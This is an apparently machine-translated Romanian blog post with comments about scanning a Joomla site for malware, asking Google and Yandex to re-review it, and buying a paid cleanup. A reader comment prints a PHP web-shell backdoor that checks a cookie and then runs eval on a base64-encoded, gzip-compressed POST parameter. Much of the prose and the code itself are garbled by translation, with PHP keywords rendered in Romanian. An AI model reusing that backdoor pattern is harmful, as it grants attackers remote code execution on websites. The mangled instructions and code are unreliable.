scanare virus Jumla
Cum de a verifica virusul on-line?
În cazul meu, este cunoscut faptul că Google și pentru a găsi Yandex „Site-ul poate pune în pericol siguranța computerului sau dispozitivul mobil.“
Pasul 1: Modificarea parolelor.
Parolele ar trebui să fie schimbat și FTP și admin Joomla. Acest lucru ne taie o dată 2 surse posibile de amenințări. Virus pe un alt computer și troienii în browser-ul admin.
Pasul 2. Script-uri în PHP pentru a scana pentru viruși.
În Internet puteți găsi un număr de opțiuni deja destul de dificil cu semnăturile de troieni. Eu prefer să folosesc script-ul samopisnaya. Datorită simplității sale, vă permite să proceseze număr mare de fișiere și nu trebuie să vă faceți griji că nu poate fi suficient timp pentru execuție. Și dacă da, atunci nu se poate rula întotdeauna la rădăcină, și proskanit ce un anumit dosar în cazul în care fișierele mai mici. Script recursiv și toate subfolderele.
De ce în Joomla în / imagini / bannere / este un script php? Script-ul de internet același nume nu este găsit, adică, nu este legată de Jumla sau plugin-uri sale. În catalog numai imagini. Bucurându-se de corpul script-ul, o parte din acesta este criptat. Bingo!
În scenariul meu, pentru curățare au un simplu pic patch_f facilitate. Unități în parametrii de cod complet malițios și unități de stocare pentru fișierele infectate.
Raport în viruși Google și Yandex eliminate de pe site.
Acesta este cel mai ușor pas. Trebuie să mergi la Google Webmaster și Yandex Webmaster. În cazul în care un site nu este înregistrat acolo, apoi se adauga. În Yandex Webmaster du-te la secțiunea „Securitate“ și să trimiteți site-ul pentru o examinare suplimentară. De obicei, este nevoie de până la o săptămână. Cu acesta din urmă site-ul Yandex a reușit în a doua zi.
În Google Webmaster - în secțiunea „Status - programe rău intenționate“ și, de asemenea pentru a trimite site-ul pentru reexaminare. Google gestionează mai luminoase și, de obicei, în decurs de 2-3 zile. Cu acesta din urmă site-ul de pe dreapta, în aceeași zi.
Joomla de căutare și de ștergere viruși (partea 2)
Puteți să mă contactați pentru ajutor în site-ul de tratament.
Costul întregului 800 de ruble.
Munca durează 1,5 - 2 ore.
Ai:
- căutare și eliminarea virușilor și a codului rău intenționat
- eliminarea vulnerabilității
- garantie 6 luni
Dragă, ai script foarte mult neoptimizat - dacă te uiți, de exemplu, codul rău intenționat pe toate fișierele, fără o mască pe hosting ieftin, fie veți depăși sau Hoster max_execution_time interzis pentru depășirea descărcarea ...
Este mai bine să nu utilizeze funcția array_flat (), și atribuie rezultatul imediat în subdirectoare funcția getFilesFromDir () buclă, iar contorul de recurență la 10.000 de fișiere depășește deja ...
În primul scenariu a fost scris pentru mine, nu am nevoie de ea pentru a optimiza
A doua problemă cu performanța sa nu am avut încă loc, deși a fost folosit pe shared hosting ieftin
În al treilea rând Dacă aveți probleme, puteți rula pur și simplu script-ul nu este la rădăcină, și într-un anumit dosar.
Sunteți încercarea de a salva pe meciuri.
Dacă cineva poate ajuta, malware in php-script, am făcut acest lucru:
if (! gol ($ _ COOKIE [ 'utma __']) și substr ($ _ COOKIE [ 'utma __'], 0,16) == '3469825000034634'), în cazul în care (! gol ($ _POST [ 'msg']) și $ msg = @ gzinflate (@ base64_decode (@str_replace ( '', », urldecode ($ _POST [ 'msg']))))) echo»;
eval ($ msg);
echo 'bg';
ieșire;
>>
Da, este o greșeală comună. Clean js vse.A și după un timp totul revine la normal.